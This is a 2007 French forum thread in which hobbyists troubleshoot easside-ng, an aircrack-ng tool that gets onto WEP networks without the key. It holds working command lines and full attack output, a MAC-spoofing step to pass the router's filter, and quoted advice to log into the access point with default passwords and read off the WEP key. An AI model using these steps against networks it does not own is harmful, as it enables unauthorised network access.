Forum d'entraide: tuto-fr.com

M1ck3y · 01-09-2007 01:12:21

J'ai commencé à tester Easside-ng (Wesside n'est pas très stable apparemment, et le crack automatique ne m'intéresse pas des masses). Là je bloque à la première étape:
bt~#buddy-ng
waiting for connection
Comment connecter le buddy server? D'ailleurs il va se connecter ou celui là? C'est le routeur qui me bloque le port 6969? Ou bien c'est parce que je n'ai pas sqlite 4.0?
Bon, j'aimerais bien réussir à faire tourner easside, parce que sur le principe c'est un truc de dingue, se connecter au routeur sans avoir la clé wep, je veux le voir de mes propres yeux...
Apparemment avant tout il faut lancer modprobe tun, puis buddy-ng. Easside-ng me dit "can't parse my ip" pendant que le buddy server "waiting for connection"
Un ptit coup de main pour comprendre comment ça fonctionne?

01-09-2007 01:12:21

charly5942 · 01-09-2007 09:54:46

Tu as réussi à avoir les sources car elles ont été retirées du site officie???!!!
Je vais essayer de m'y mettre la semaine prochaine!
Bon courage

M1ck3y · 01-09-2007 15:10:04

En fait jusqu'ici j'utilisais Aircrack_ng_1_0_dev_svn_613.lzm, mais la dev_svn_653 est sortie, et je viens de le voir à l'intant la dev_svn_671 est dispo depuis 2 jours.
Je vais de ce pas la télécharger ici:
http://www.slax.org/modules.php?categor … ircrack-ng
Ensuite un petit mo2lzm, je me refais une iso propre avec sqlite 4.0 et quelques modules sympas, et puis je reprend les tests. J'ai lu quelques news sur Wesside-ng, apparemment les "error max retransmit" sont monnaie courante, ça ne veut pas dire que le programme bug, parfois il faut une heure d'essais avant que ça crack quelque chose. Donc autant le faire en manuel, au moins on sait exactement ce qui se passe, c'est plus rapide et plus intéressant. Je ne vois pas grand intéret à ce wesside, sauf peut etre pour les noob qui se contenteront de lancer weside-ng enter, wesside-ng enter jusqu'à ce que ça donne un résultat... Par contre je veux vraiment faire tourner easside! Je vais préparer mes modules, et c'est parti...

ftggc · 01-09-2007 15:32:41

Edit: c'est même la Revision 672 maintenant

Bonjour,
Easside-ng se trouve dans la suite aircrack 1.0 qui est actuelement en beta.

pour l'installer: il faut installer une librairie:

Code:

cd /usr/local/bin/
ln -s tclsh8.4 tclsh

curl -O http://www.sqlite.org/sqlite-3.4.0.tar.gz
tar xvzf sqlite-3.4.0.tar.gz
cd sqlite-3.4.0
./configure --prefix=/usr/local
make && make install

puis aicrack:

Code:

svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev
cd 1.0-dev
make
make install

On a la doc de Esside ici: http://aircrack-ng.org/doku.php?id=easside-ng

Why easside-ng when aircrack-ng has PTW?

Why release easside-ng when aircrack-ng has PTW?

*
easside-ng was private and came a year before PTW.
*
easside-ng is handy for a quick and stealthy attack. It is significantly faster than PTW. It's “instant” and requires no flooding.

On apprend que easside existait bien avant aircrack-ptw mais qu'il restait dans un cercle privé. Mais semble etre plus rapide et plus "furtif" que ce dernier ( pas d'envoie massif de packets?)

Il semblerait que easside utilise l'attaque par fragmentation

Make sure your card supports the fragmentation attack.

Donc easside est stable selon la doc contrairement a weeside qui est "Proof of concept"

Pour l'utiliser, d'apres ce que j'ai compris, il faut créer un serveur sur son propre pc vià budy-ng tout en étant deja connecter au web.

First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.

Ensuite on lance easside qui va utiliser la fragmentation
Puis il semble qu'il faut creer/reveiller? une autre interface dites "TAP(???)

At this point, you need to bring up the TAP interface:
ifconfig at0 up

Le resultat final de l'attaque semble etre la découverte de l'ip web de l'AP

Code:

 Checking for internet... 1
 Internet w0rx.  Public IP 10.113.65.187
 Rtt 77ms

Puis a partir de là nous pouvons entré dans l'AP... et ça la clé wep...

log into the AP with your favourite browser. 99% of the time, the APs have default ids and passwords. Many times there are no passwords set. Once logged into the AP, you can go to the WEP settings page and read off the WEP key from the configuration page. In some cases, where there are asterisks (*) for the key, you may need to look at the HTML source or use a tool to reveal the password.

Tout de même tiré par les cheuveux je trouve. Enfin peut etre que ce genre d'attaque sera compatible WPA...( ou qu'elle sortira d'ici peu des cercles privés...).
Mais pour l'heure, la partie qui utilise la fragmentation n'est donc compatible qu'avec le wep ( si je ne m'abuse)

Mais petite parrenthese, l'attaque par fragmentation n'est pas si vieille! Hors ils disent : "easside-ng was private and came a year before PTW." Donc si easside-ng existe depuis environ 18mois, avant même la publication de l'attaque par fragmentation... ils utilisaient peut etre une autre technique... (kortek, ou autres... (wpa?!^^))

Pour finir, une limitation quand même...:

Only open authentication is support. Shared key authentication is not supported.

Sur ce, j'essayerais cela quand je serais sortit de ma campagne

Dernière modification par ftggc (01-09-2007 15:35:19)

M1ck3y · 01-09-2007 17:53:44

Voila, j'ai mis en place la config pour les tests sur l'autre ordi, c'est en train de tourner. Apparemment ça va un peu mieux avec sqlite, je n'ai plus le message "can't parse my ip".
En revanche j'ai celui ci:
bt TEST_Easside #easside-ng -f wlan0 -v 00:16:41:xx:xx:xx -m xx:xx:xx:xx:xx:xx -c 10 -s 192.168.1.11
Setting tap MTU
Sorting out wifi MAC
easside-ng: wi_set mac(): Bad address

j'ai essayé avec l'ip de la carte wifi connectée au net sur cet exemple, j'ai aussi essayé avec l'ip internet externe de la box, avec l'ip de la box, ça donne le meme résultat.
J'ai utilisé comme paramètres:
-f wlan0 (en monitor, airodump tourne en prallele pour que je puisse voir ce qui se passe, j'utilise une autre carte wifi pour me connecter au net, la connection est ok sur rausb0)
-v: la mac de la box sur laquelle je suis connecté en ce moment meme sous win
-m:la mac de l'ordi sous win (avec lequel j'écris sur le forum )
Bon, ça avance tranquillement...

M1ck3y · 01-09-2007 18:37:03

Oulala, ça commence à sentir très bon...
Je viens de capter une petite subtilité, apparemment easside ne fonctionne pas avec la mac d'une station déja connectée au routeur (conflit de mac probablement). J'ai supprimé l'option -m, mis un ptit coup de macchanger sur wlan0 en lui attribuant une autre mac (qui figure dans la liste du filtre mac du routeur bien sur) et j'ai obtenu ce joli résultat:

bt TEST_Easside # easside-ng -f wlan0 -v 00:16:41:xx:xx:xx -c 10 -s 192.168.1.11
Setting tap MTU
Sorting out wifi MAC
MAC is xx:xx:xx:xx:xx:xx
Setting tap MAC
[16:55:03.916926] Ownin...
Assuming IP 48
[16:55:03.917550] Got 12 bytes of PRGA IV [BE:15:94]

SSID Livebox-xxxx Chan 10 Mac 00:16:41:xx:xx:xx
Sending auth request
Authenticated
Sending assoc request
Associated: 2
[16:55:04.401367] Got 28 bytes of PRGA IV [C6:15:94]
[16:55:04.709035] Got 76 bytes of PRGA IV [C9:15:94]
[16:55:05.017295] Got 220 bytes of PRGA IV [D0:15:94]
[16:55:05.328034] Got 652 bytes of PRGA IV [D8:15:94]
[16:55:05.642050] Got 1504 bytes of PRGA IV [DE:15:94]
[16:55:10.229366] Guessing prga byte 13 with 7D
Got IP ID
[16:55:16.373731] Guessing prga byte 16 with 98
Got IP TTL
[16:55:18.829873] Guessing prga byte 17 with C9
Got proto tcp
[16:55:22.517139] Guessing prga byte 19 with 65
Got checksum [could use to help bforce addr]
[16:55:24.669262] Guessing prga byte 20 with B0
Source IP so far: 192
[16:55:26.206266] Guessing prga byte 21 with 7C
Source IP so far: 192.168
[16:55:29.278511] Guessing prga byte 22 with FC
Source IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Sending who has 192.168.1.1 tell 192.168.1.123
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC xx:xx:xx:xx:xx:xx =>celle là je sais pas d'ou elle sort?
Trying to connect to buddy: 192.168.1.11:6969
Connected
Handshake compl33t
Checking for internet... 1
Checking for internet... 2
Checking for internet... 3
Checking for internet... 4
Checking for internet... 5
Checking for internet... 6
Checking for internet... 7
Checking for internet... 8
Checking for internet... 9
Checking for internet... 10
Checking for internet... 11
Checking for internet... 12
Checking for internet... 13
Checking for internet... 14
Checking for internet... 15
Checking for internet... 16
Checking for internet... 17
Checking for internet... 18
Checking for internet... 19
Checking for internet... 20
Checking for internet... 21
Checking for internet... 22
Checking for internet... 23
Checking for internet... 24
Checking for internet... 25
Dying: signal
bt TEST_Easside #

Parallèlement, notre ami le buddy a donné cela:

bt TEST_Easside # buddy-ng
Waiting for connexion
Got connection from 192.168.1.11
Handshake complete
That was it
Waiting for connexion

Je m'approche, là je suspecte un problème lié à ma box de m**** qui a sérieusment tendance à refuser les connections entrantes, il doit y avoir un paramètre de nat à configurer pour rediriger le port 6969 du buddy-server, ça doit etre un truc dans le genre. En tout cas c'est déja bien mieux que "can't parse my ip" ou "wi_set mac(): Bad address"
Au boulot les gars c'est presque bon là allez allez allez...

(à noter: l'ip à renseigner dans le paramètre -s semble bien etre celle de la carte réseau qui dispose de la connection internet d'après le résultat de ce test)

M1ck3y · 01-09-2007 19:23:33

Déja que les drivers r8187 sont buggy, là tous les essais d'easside-ng ont planté mon alfa, les ifconfig down, up et le débranchement sauvage n'y font rien, un reboot est nécessaire. Je reprendrais cet intéressant test dès que possible.

ftggc · 01-09-2007 20:53:18

As tu ouvert ton port? Il ne faut pas oublier que easside-ng fait le "detour" par internet.

A “buddy” server must exist on the Internet without firewalling of the port used by easside-ng. The default is TCP and UDP port 6969.

M1ck3y · 01-09-2007 23:00:20

Oui bien sur c'est le premier truc que j'ai fait, mais le port forwarding sur les livebox est plus que douteux lol... J'en ai discuté avec darkAudax, un des programmeurs d'aircrack-ng tout à l'heure sur irc, et pour lui aussi c'est un problème dans ce genre. Du coup j'ai appris quelques trucs sympas, dès que les tests sont concluants je balancerais un petit tuto ou une vidéo là dessus.

M1ck3y · 02-09-2007 00:24:41

Bon, j'ai vraissemblablement un problème sur le port 6969 en udp. Sur la machine faisant tourner easside, les ports 6969 tcp et 6969 udp devraient etre en écoute (listen), mais la commande netstat -anp ne montre que le tcp en listen, et pas l'udp. Quand je scanne l'ordi depuis l'exterieur, seul le port tcp 6969 est ouvert. Comment ouvrir le port udp 6969 sous BT2?

Billyboylindien · 06-09-2007 00:09:38

Waow je decouvre.
Il faut que je test ça de mon coté moi aussi

Merci de l'info.

Billyboylindien · 06-09-2007 00:42:42

Arf, c'est compliqué mais ça a l'air puissant quand même.

Ca necessite le net, mais comme tu dis, c'est interressant comme concept d'attaque et prometteur pour le WPA ou autre.

Je peux pas tester de suite, je peux pas faire de nat .

M1ck3y · 06-09-2007 01:49:04

Tu me diras si tu as le message "internet w0rks"... J'y étais presque arrivé

Grand Hibou · 15-10-2007 00:13:52

M1ck3y a écrit:
Bon, j'ai vraissemblablement un problème sur le port 6969 en udp. Sur la machine faisant tourner easside, les ports 6969 tcp et 6969 udp devraient etre en écoute (listen), mais la commande netstat -anp ne montre que le tcp en listen, et pas l'udp. Quand je scanne l'ordi depuis l'exterieur, seul le port tcp 6969 est ouvert. Comment ouvrir le port udp 6969 sous BT2?

Tu as essayé de faire un netcat pour ouvrir le port?

commande: nc -l -u -p 6969

Après tu vérifies avec nmap ton port udp pour vérifier si il est bien ouvert.
Tu peux aussi tester le port depuis une autre machine avec netcat lui même: nc ipdelamachine -u 6969
Ensuite tu lui dit "salut port 6969!" tu valides... et tu vois le message s'afficher en direct sur l'écran de la console de la becanne où le port est en écoute.
Cela dit cela ne dispense pas de faire du NAT pour ce port si il doit être joignable de l'extérieur.

Dernière modification par Grand Hibou (23-10-2007 22:07:21)

Grand Hibou · 29-10-2007 14:50:16

Alors M1ck3y? tu as essayé l'ouverture de port udp par netcat pour voir si cela résoud le problème?
Un de ces 4 je vais essayer la bête aussi!

M1ck3y · 29-10-2007 20:37:42

Dès que j'ai quelques heures, je me penche là dessus jusqu'à avoir le message tant attendu "internet w0rks"

Grand Hibou · 20-11-2007 04:27:17

bon, je viens d'essayer de faire tourner easside-ng sur BT2.

Alors ce qui est zarbi chez moi c'est l'ip qu'il sonde à partir d'un moment, et il en démord plus de la sonder pendant des siècles. Cette ip n'a rien à voir avec aucune de mes ip lan ou externe. Et en plusieurs tests il refait à chaque fois la même chose avec des ip venues de nulle part. Et donc il continue ça ad eternum une fois qu'il a cette ip, sans qu'il ne se passe rien de plus après (bon, j'ai pas attendu 5 siècles non plus hein! )

screenshot
(cliquez pour aggrandir)

Dernière modification par Grand Hibou (20-11-2007 04:28:19)

Forum d'entraide: tuto-fr.com

Promos wifi

Easside-ng, on teste?

#1 01-09-2007 01:12:21

Easside-ng, on teste?

01-09-2007 01:12:21

#2 01-09-2007 09:54:46

Re: Easside-ng, on teste?

#3 01-09-2007 15:10:04

Re: Easside-ng, on teste?

#4 01-09-2007 15:32:41

Re: Easside-ng, on teste?

Code:

Code:

Code:

#5 01-09-2007 17:53:44

Re: Easside-ng, on teste?

#6 01-09-2007 18:37:03

Re: Easside-ng, on teste?

#7 01-09-2007 19:23:33

Re: Easside-ng, on teste?

#8 01-09-2007 20:53:18

Re: Easside-ng, on teste?

#9 01-09-2007 23:00:20

Re: Easside-ng, on teste?

#10 02-09-2007 00:24:41

Re: Easside-ng, on teste?

#11 06-09-2007 00:09:38

Re: Easside-ng, on teste?

#12 06-09-2007 00:42:42

Re: Easside-ng, on teste?

#13 06-09-2007 01:49:04

Re: Easside-ng, on teste?

#14 15-10-2007 00:13:52

Re: Easside-ng, on teste?

M1ck3y a écrit:

#15 29-10-2007 14:50:16

Re: Easside-ng, on teste?

#16 29-10-2007 20:37:42

Re: Easside-ng, on teste?

#17 20-11-2007 04:27:17

Re: Easside-ng, on teste?

Message rapide

Pied de page du Forum